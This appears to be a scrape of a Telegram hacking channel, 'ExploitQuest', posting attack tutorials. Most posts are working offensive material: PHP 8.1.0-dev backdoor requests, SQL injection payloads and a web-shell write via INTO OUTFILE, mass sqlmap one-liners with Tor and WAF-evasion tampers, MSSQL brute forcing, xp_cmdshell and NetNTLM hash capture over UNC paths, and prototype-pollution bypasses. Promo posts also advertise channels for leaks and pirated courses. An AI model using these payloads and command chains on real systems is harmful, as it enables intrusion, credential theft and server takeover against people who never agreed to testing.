ExploitQuest

How do hackers find hidden pages on your site?
It's not magic, it's technique.

It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.

Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).

🛠 Examples of use:

• Fuzzing with custom headers:

ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -H "Custom-Header: value"

• Recursive Fuzzing with Specific Depth:

ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -recursion -recursion-depth 2

• Targeting specific patterns in responses:

ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -mr "regex-pattern"

Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.

But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.

🔥6👍1

2.57K views08:35

ExploitQuest

PHP 8.1.0-dev RCE via User-Agentt Exploit

Introduction
In some versions of PHP 8.1.0-dev, a Remote Code Execution (RCE) vulnerability was discovered through an uncommon HTTP header called User-Agentt. This vulnerability can be exploited if the application processes incoming headers without proper sanitization, allowing arbitrary system commands to be executed on the server.

How Does the Vulnerability Work?
The vulnerability occurs when the application uses

$_SERVER['HTTP_USER_AGENTT']

unsafely, especially if the value is passed to functions like eval() or system().

If input validation is not implemented, attackers can execute unauthorized commands directly on the server.

Example of Vulnerable PHP Code

<?php
$user_agent = $_SERVER['HTTP_USER_AGENTT'];
eval($user_agent);
?>

Why is this dangerous?
Because an attacker can send an HTTP request with a User-Agentt header containing malicious PHP code, which will be executed directly on the server.

How to Exploit the Vulnerability

1. Testing Delay with sleep()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsleep(5);

•If the response is delayed by 5 seconds, it confirms that the code is being executed successfully.

2. Executing a System Command

with system()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsystem('id');

•If the server responds with user information such as:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

•this means RCE exploitation is successful.

3. Executing PHP via phpinfo()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumphpinfo();

•This might display the current PHP configuration, which helps in understanding the target environment.

Conclusion
This vulnerability is extremely dangerous because it allows direct command execution on the server, potentially leading to a full compromise. Developers must be cautious about handling external inputs and always keep their PHP versions up to date.

#ExploitQuest #ExploitQuest

@ExploitQuest

👍5❤1

3.36K viewsedited 09:08

ExploitQuest

Our new channel, for Red Hat Hackers

https://t.me/GlobalRedHat

Global Red Hat

- This channel is by @darks1ders .
- Contact Us: @END6BOT .
- For educational purposes only.

👍3❤2

2.95K views21:44

ExploitQuest

Forwarded from Global Red Team

أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.

@iiLinux

قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.

@GlobalRedHat

المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.

@k7ali_linux

قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.

@ExploitQuest

قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.

@EgyptianshieldTOOLS

قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.

@iiMrDark

قناة تقدم محتوى خاص بالتسريبات والبرامج.

@Wa3i_Tech

قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.

@codearabs

قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.

@Egyshield

قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.

@GlobalRedTeam

المجتمع الرسمي لـGlobal Red Team

@darkcsc

قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

3.16K views17:50

ExploitQuest

Forwarded from Global Red Hat

Join our group
انضموا إلى مجموعتنا
https://t.me/GlobalRedHatGroup

2.73K views17:50

ExploitQuest

Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi

SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).

This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.

━━━━━━━━━━━━━━━━━━

1. Discovering SQL Injection Vulnerabilities in Multiple Ways

🔹Method 1: Manual Testing with Special Characters

The simplest way to test for SQL Injection is by inserting special characters such as:

'
"
--
#
;

Example 1: Injecting a Single Quote

'

If a website has a login page like:

https://example.com/login.php?user=admin

Try entering:

https://example.com/login.php?user=admin'

If an error appears like:

You have an error in your SQL syntax...

It indicates an SQL Injection vulnerability.

━━━━━━━━━━━━━━━━━━

🔹Method 2: Injecting Simple SQL Queries

If the backend SQL query looks like this:

SELECT * FROM users WHERE username = '$user' AND password = '$pass'

You can try the following payloads:

admin' --

' OR '1'='1' --

If you gain access without entering a password, the application is vulnerable.

━━━━━━━━━━━━━━━━━━

🔹 Method 3: Using SQLMap for Automated Testing

🔹 SQLMap is a powerful tool for automated SQL Injection detection. Run:

sqlmap -u "https://example.com/login.php?user=admin" --dbs

SQLMap will analyze the URL and extract the database names if vulnerable.

━━━━━━━━━━━━━━━━━━

🔹Method 4: Testing with SQL Sleep (Time-Based SQLi)

If error messages are hidden, you can test for Time-Based SQLi:

https://example.com/page?id=1' AND SLEEP(5) --

If the page takes 5 seconds to load, the database is likely vulnerable.

━━━━━━━━━━━━━━━━━━

🔹Method 5: Data Extraction via UNION-Based SQL Injection

If a website displays data from a database, try injecting a UNION SELECT query:

https://example.com/page?id=1 UNION SELECT 1,2,3,4 --

If numbers or unexpected data appear, the website is vulnerable.

━━━━━━━━━━━━━━━━━━

2. Escalating SQL Injection to RCE (Remote Code Execution)

If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server.

🔹Example: Uploading a Web Shell via SQLi

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

Now, access the shell through:

http://target.com/shell.php?cmd=whoami

🔹If SQL Server has xp_cmdshell enabled, execute system commands like:

EXEC xp_cmdshell 'whoami';

This will return the current system user running the database service.

━━━━━━━━━━━━━━━━━━

3. Exploiting SQL Injection to Gain Admin Access

In some cases, SQLi can be used to escalate privileges by modifying session data:

UPDATE users SET is_admin = 1 WHERE username = 'victim';

Or steal an admin session:

SELECT session_id FROM users WHERE username = 'admin';

💡 Conclusion

•Test manually using ' and OR 1=1

•Use SQLMap for automatic SQLi detection

•Escalate SQLi to RCE if the system allows file operations

•Test SQL Sleep (Time-Based Injection) for hidden errors

•Use UNION SELECT to extract sensitive data

━━━━━━━━━━━━━━━━━━

🚀 Join now

[https://t.me/ExploitQuest]

#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering

ExploitQuest

contact: @ExploitQuestbot

👍11❤6

8.65K viewsedited 20:55

ExploitQuest

0:26

This media is not supported in your browser

VIEW IN TELEGRAM

Today my birthday ❤️

❤22🥰4👍1

3.99K views22:22

ExploitQuest

CORS one liner command exploiter

This is an extremely helpful and practical Cheatsheet for Bug Hunters, which helps you find CORS missconfiguration in every possible method. Simply replace https://example.com with the URL you want to target. This will help you scan for CORS vulnerability without the need of an external tool. What you have to do is to copy-and-paste the commands into your terminal and finger crossed for any possible CORS.

Github

#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE

GitHub

GitHub - kleiton0x00/CORS-one-liner: A one liner Bash command which finds CORS in every possible endpoint.

A one liner Bash command which finds CORS in every possible endpoint. - kleiton0x00/CORS-one-liner

👍5👏5

4.53K views08:16

"I discovered a vulnerability in a website that allowed me to escalate my privileges from a regular user to an admin. This privilege escalation granted me access to other users' data, the full database, and the admin control panel."

https://t.me/ExploitQuest

❤22🤯10👍4🔥3🤷2

9.9K viewsedited 08:18

ExploitQuest

ExploitQuest pinned a video

18:45

ExploitQuest

Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.

But what happens if we change the request method to POST, PUT, or DELETE?

This can lead to different reactions from the server, such as:

1-Rejecting the request and returning 405 Method Not Allowed.

2-Processing the request in an
unexpected way, potentially causing errors or data leaks.

3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).

━━━━━━━━━━━━━━━━━━

Impact on Web Frameworks (e.g., Laravel)

Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:

•Database credentials.

•Environment variables.

•File paths and internal configurations.

In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.

━━━━━━━━━━━━━━━━━━

Practical Examples

Example 1: 405 Error When Changing Method

Trying to send a POST request to an endpoint that only allows GET:

curl -X POST http://example.com/

The server might respond with:

HTTP/1.1 405 Method Not Allowed

Example 2: Internal Error Due to Unexpected Request

If a server encounters an error when

processing an unexpected request method, it might return:

HTTP/1.1 500 Internal Server Error

In Laravel, if APP_DEBUG=true, it might expose sensitive details like:

SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'

This could reveal database credentials or configuration files.

Example 3: RCE Exploitation in Laravel

If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:

curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"

If the server is not properly filtering input, it may execute the whoami command and return the server's user name.

#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE

👍5🔥2❤1

4.89K views23:14

ExploitQuest

A Simple Yet Effective Way to Find SQLI Vulnerabilities

Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Here’s an optimized approach:

1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:

waybackurls --dates target.com | grep '?id='

This helps identify pages that may still be vulnerable.

━━━━━━━━━━━━━━━━━━

2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:

if(now()=sysdate(),SLEEP(8),0)

If the response is delayed by ~8 seconds, the parameter is likely injectable.

━━━━━━━━━━━━━━━━━━

3. Manual Testing with cURL

curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"

•The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.

•Modify headers like User-Agent to mimic real traffic.

━━━━━━━━━━━━━━━━━━

4. Automated Testing with Ghauri (Bypassing WAFs)

ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403

--timeout=30: Sets the request timeout to 30 seconds.

--delay=5: Adds a 5-second delay between requests to avoid detection.

--technique=BEST: Uses the most effective SQL injection techniques.

--level=3: Performs more advanced tests for better detection.

--prefix="/**/": Adds a comment prefix to bypass WAF filters.

--suffix="-- -": Ends the payload with a SQL comment to evade detection.

--safe-chars="[]": Prevents certain characters from being URL-encoded.

--random-agent: Uses a random User-Agent to avoid fingerprinting.

--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.

━━━━━━━━━━━━━━━━━━

5. Advanced Testing with SQLMap

sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3

--random-agent: Uses random user-agents to avoid detection.

--tamper: Applies obfuscation techniques to evade WAFs.

--risk=3 --level=5: Enables deep scanning with advanced payloads.

━━━━━━━━━━━━━━━━━━

Conclusion
✅ Wayback Machine helps find old endpoints.

✅ Manual payloads help confirm basic SQL injection.

✅ Ghauri & SQLMap provide automation with WAF bypass techniques.

━━━━━━━━━━━━━━━━━━

[https://t.me/ExploitQuest]

#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas

ExploitQuest

contact: @ExploitQuestbot

❤8👍2🔥1

3.69K views22:09

ExploitQuest

Here is a more optimized one-liner for finding SQL injection vulnerabilities while bypassing WAF efficiently:

gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tamper="between,space2comment,charencode" --level=5 --risk=3 --batch --threads=10 --time-sec=5

More aggressive alternative for bypassing WAF with Tor and Hex encoding:

gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tor --proxy="socks5://127.0.0.1:9050" --tamper="space2comment,charencode,randomcase" --hex --batch --threads=5 --timeout=10

Try it and see the results!

👍6👏3

2.84K views22:21

ExploitQuest

These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:

1️⃣ Using Archive.org to Find Archived URLs
URL:

https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

Explanation:

•This query retrieves all archived URLs of example.com from Wayback Machine.

•*.example.com/* searches for all subdomains and pages.

•collapse=urlkey removes duplicate URLs.

•output=text formats the output as
plain text.

•fl=original extracts only the original URLs without extra metadata.

━━━━━━━━━━━━━━━━━━

2️⃣ Using VirusTotal to Get a Domain Report
URL:

https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com

Explanation:

•Retrieves a security report for example.com from VirusTotal.

•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs

•Replace YOUR_API_KEY with a valid VirusTotal API key.

━━━━━━━━━━━━━━━━━━

3️⃣ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:

https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1

Explanation:

•Queries AlienVault OTX for URLs associated with domain.com.

•limit=500 retrieves up to 500 URLs per page.

•page=1 fetches the first page of results.

━━━━━━━━━━━━━━━━━━

4️⃣ Using curl to Fetch Archived URLs and Save Them to a File
Command:

curl -G "https://web.archive.org/cdx/search/cdx" \
  --data-urlencode "url=*.example.com/*" \
  --data-urlencode "collapse=urlkey" \
  --data-urlencode "output=text" \
  --data-urlencode "fl=original" > out.txt

Explanation:

•Fetches all archived URLs of example.com from Wayback Machine.

•Saves the output to out.txt for further processing.

━━━━━━━━━━━━━━━━━━

5️⃣ Extracting Sensitive Files Using uro and grep
Command:

cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'

Explanation:

1-cat out.txt → Reads the archived URLs from out.txt.

2-uro → Deduplicates and normalizes URLs.

3-grep -E → Uses regular expressions (regex) to extract potentially sensitive files, such as:

•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi

━━━━━━━━━━━━━━━━━━

🔍 Summary:

These commands help in discovering and analyzing sensitive files that might be publicly accessible by:

1-Fetching archived URLs from Wayback Machine.

2-Checking for malicious activity on VirusTotal and AlienVault.

3-Filtering sensitive files using grep and uro.

[https://t.me/ExploitQuest]

#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas

❤6👍5

3.07K viewsedited 09:02

ExploitQuest

🔹Microsoft SQL Server Abuse Techniques 🔹

👋 Hello, friends!
I often discuss Microsoft SQL Server (MSSQL) abuse in interviews, and surprisingly, many people have only a superficial understanding of it. However, MSSQL is widely used in corporate networks, and if misconfigured, it can become a valuable entry point for attackers.

In this post, I have gathered the main MSSQL abuse techniques to help you:

✅ Understand possible attack vectors.

✅ Prepare for interviews.

✅ Organize your knowledge.

━━━━━━━━━━━━━━━━━━

📖 MSSQL Basics
Microsoft SQL Server (MSSQL) is a relational database management system (DBMS) developed by Microsoft, commonly used in corporate environments for storing and processing data.

🔹 Main Components:

✅ Database Engine – Stores, processes, and manages data.

✅ SQL Server Agent – Automates tasks (e.g., backups).

✅ SQL Server Browser – Helps clients find MSSQL instances.

✅ SSIS (Integration Services) – Handles data integration.

✅ SSRS (Reporting Services) – Generates reports.

✅ SSAS (Analysis Services) – Provides analytics and data processing.

🔹 User Roles in MSSQL:

🔸 sysadmin – Full privileges on the server.

🔸 db_owner – Full rights within a specific database.

🔸 db_datareader – Read-only access.

🔸 db_datawriter – Ability to modify data.

🔸 public – Default role for all users (may have more permissions than expected).

🔹 Authentication Methods:

🔹 Windows Authentication – Uses NTLM/Kerberos for domain-based authentication.

🔹 SQL Authentication – Uses local MSSQL accounts (e.g., sa, custom user logins).

🔍 Detecting MSSQL on the Network
Before attacking, you must first locate MSSQL instances.

🔹 PowerUpSQL (PowerShell)

Get-SQLInstanceDomain

🔹 Nmap

nmap -p 1433 --script ms-sql-info <IP>

🔹 Metasploit

use auxiliary/scanner/mssql/mssql_ping

🔹 go-windapsearch

go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName

🔑 Gaining Access to MSSQL
🔹 Brute Force Attack

hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt

━━━━━━━━━━━━━━━━━━

🚀 Privilege Escalation: Local Admin → Sysadmin

The main MSSQL process (sqlservr.exe) runs under a Windows account with limited privileges, but inside SQL Server, it is often assigned sysadmin by default. Compromising this service can lead to full domain control!

🔹 Step 1: Find Local MSSQL

Get-SQLInstanceLocal

🔹 Step 2: Impersonate SQL Service Accounts

Invoke-SQLImpersonateService -Verbose -Instance your_instance_name

🎯 Executing OS Commands via MSSQL
If an attacker gains access to MSSQL, they can execute Windows commands using:

🔹 CLR (Common Language Runtime) Assembly
Allows executing .NET code (C#, VB.NET) inside MSSQL.

Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

🔹 OLE Automation Procedures
Allows running COM objects from T-SQL.

Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"

🔹 xp_cmdshell (Built-in Stored Procedure)
Executes Windows commands directly from MSSQL.

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"

━━━━━━━━━━━━━━━━━━

🔚 Conclusion
MSSQL misconfigurations can lead to serious security risks, including:
⚠ Unauthorized access to databases.
⚠ Privilege escalation to sysadmin.
⚠ Remote code execution (RCE).
⚠ Lateral movement across corporate networks.
🔍 Understanding these techniques is essential for security professionals to prevent attacks and secure corporate environments. Stay safe! 🚀

[https://t.me/ExploitQuest]

#CyberSecurity #MSSQL #EthicalHacking

ExploitQuest

contact: @ExploitQuestbot

👍8🔥5

2.81K views00:40

ExploitQuest

MSSQL Exploitation Techniques

🔹 External Scripts (Python/R) – Allows executing Python & R code in Microsoft SQL Server.

-- Execute Python script
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'

-- Execute R script
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));

PowerUpSQL Commands:

# Remote Execution
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

# Local Execution
Get-SQLInstanceLocal | Invoke-SQLOSCmdPython -Verbose -Command "whoami"
Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"

🔹 UNC Path Injection – Extracts NetNTLM hashes via SMB.

EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';

PowerUpSQL Command:

Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost

🔹 Lateral Movement via Linked Servers
Linked Servers allow connections to other SQL Servers, MySQL, Oracle, PostgreSQL, and more.

-- List Linked Servers
EXEC sp_linkedservers;

-- Execute command on remote server
EXEC ('whoami') AT [LINKED_SERVER];

PowerUpSQL Commands:

# Find linked servers
Get-SQLServerLink -Instance YourInstance -Verbose

# Check privileges on remote server
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose

# Enable xp_cmdshell on linked server
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"

🔥 That's all, friends!
Happy hacking and see you next time! 🚀

#RedTeam #MSSQL #BugBounty #CyberSecurity

👍5❤4🤯3

3.34K views02:16

ExploitQuest

Prototype Pollution Vulnerability
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.

However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.

━━━━━━━━━━━━━━━━━━

Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.

Creating an object in JavaScript is simple:

let userInfo = {
    "username": "admin",
    "password": "1qaz2wsx3edc",
    "email": "admin@victim.com"
};

To access properties of this object, we can use two methods:

1-Dot notation:

userInfo.username;

Bracket notation:

userInfo["username"];

One of these methods is used for polluting the prototype of an object.

━━━━━━━━━━━━━━━━━━

How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.

•If the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.

Example:

var name = "Arya";
console.log(name.proto);

Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.

Moreover, we can manually reference an object's prototype using:

a.proto;

Ex

ploiting Prototype Pollution
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.

━━━━━━━━━━━━━━━━━━

Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:

1️⃣ Dot Notation Approach

http://target.com/?proto.arya=arya

2️⃣ Bracket Notation Approach

http://target.com/?proto[arya]=arya

Bypassing WAF (Web Application Firewall)

If the WAF blocks the proto keyword, we can use constructor-based techniques:

/?constructor.prototype.arya=arya
/?constructor[prototype][arya]=arya

If the WAF still blocks requests, we can use nested obfuscation techniques:

/?proprototo[arya]=arya
/?proprototo.arya=arya
/?constconstructorructor[protoprototypetype][arya]=arya
/?constconstructorructor.protoprototypetype.arya=arya

Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:

let test = {};
console.log(test.arya); // Output: " arya"

If the property value appears, the Prototype Pollution vulnerability exists on the target system.

━━━━━━━━━━━━━━━━━━

Conclusion
Prototype Pollution is a powerful vulnerability that, when combined with other exploits, can lead to serious security risks. Understanding how JavaScript's prototype system works is essential for both attackers and defenders to identify and mitigate such threats effectively.

[https://t.me/ExploitQuest]

#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking

Target

Target : Expect More. Pay Less.

Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.

❤7👍6🔥4

3.76K viewsedited 22:22

ExploitQuest

أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.

@end_k

قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.

@iiLinux

قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.

@GlobalRedHat

المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.

@k7ali_linux

قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.

@ExploitQuest

قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.

@EgyptianshieldTOOLS

قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.

@iiMrDark

قناة تقدم محتوى خاص بالتسريبات والبرامج.

@Wa3i_Tech

قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.

@codearabs

قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.

@Egyshield

قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.

@Bad_Rabbit_Team

قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.

@GlobalRedTeam

المجتمع الرسمي لـGlobal Red Team

@darkcsc

قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

👍4❤2

3.71K views00:19

ExploitQuest

A Real-World Example of Prototype Pollution Exploitation

A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype via the URL.

To test for Prototype Pollution, they started with the following request:

https://target.com/?proto.arya=arya

However, the WAF (Web Application Firewall) blocked this attempt.

To bypass it, they got creative and modified the payload:

https://target.com/?proprototo.arya=arya

To confirm if the vulnerability was present, they opened the browser console and created an empty object:

test = {};
test.arya; // Outputs: "arya"

Since the property (arya) was successfully injected into the object, Prototype Pollution was confirmed!

But Prototype Pollution alone has no significant impact, so they needed to chain it with another vulnerability—like XSS—to escalate the attack.

━━━━━━━━━━━━━━━━━━

Leveraging Web Archives for Further Exploitation

While analyzing the target’s Web Archive, the hacker noticed many URLs contained # followed by useful information.

Reminder:
Everything after # in a URL is not sent to the server but is processed directly by the DOM, meaning the WAF won’t block it!

The hacker decided to test this method:

https://target.com/#proto.arya=arya

By following the same console-based verification, they confirmed the attack worked.

━━━━━━━━━━━━━━━━━━

Turning Prototype Pollution into
XSS

Through behavior analysis, they discovered that injected values were being inserted into the style attribute of HTML elements.

Now, they could escalate this attack by chaining Prototype Pollution with XSS:

https://target.com/#proto[onload]=alert(1)

━━━━━━━━━━━━━━━━━━

Prototype Pollution - Server Side

Prototype Pollution isn’t just a client-side issue—it can also be exploited on the server side.

If a Node.js server uses libraries that improperly merge user input into objects (e.g., lodash, merge, deepExtend, setValue), it becomes vulnerable!

Example of a Vulnerable Node.js Code

const _ = require('lodash');  
const express = require('express');  
const app = express();  

app.use(express.json());  

app.post('/update', (req, res) => {  
    let defaultConfig = { role: 'user' };  
    let userConfig = req.body;  

    let finalConfig = _.merge({}, defaultConfig, userConfig);  

    res.json(finalConfig);  
});  

app.listen(3000, () => console.log("Server running on port 3000"));

Where’s the Problem?

The function _.merge() merges user input with the defaultConfig object.

If an attacker sends a payload with proto, they can modify the prototype of all objects in the application!

━━━━━━━━━━━━━━━━━━

Attack Scenario (Exploiting the
Above Code)

The hacker discovers an API endpoint /update that sets user roles.

They send the following malicious request:

POST /update HTTP/1.1
Host: target.com
Content-Type: application/json

{
"proto": { "isAdmin":
true }
}

What Happens?
Since proto affects Object.prototype, every new object created in the application will automatically have isAdmin = true!

Conclusion
Prototype Pollution is a serious vulnerability that can be exploited both client-side and server-side.
When combined with other vulnerabilities (like XSS, RCE, or privilege escalation), it can have a critical impact.
Developers should use secure coding practices and avoid unsafe object merging in applications.

[https://t.me/ExploitQuest]

Target

Target : Expect More. Pay Less.

Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.

❤7👍6🔥4🤯1

4.32K viewsedited 04:10

ExploitQuest

Forwarded from s4rrar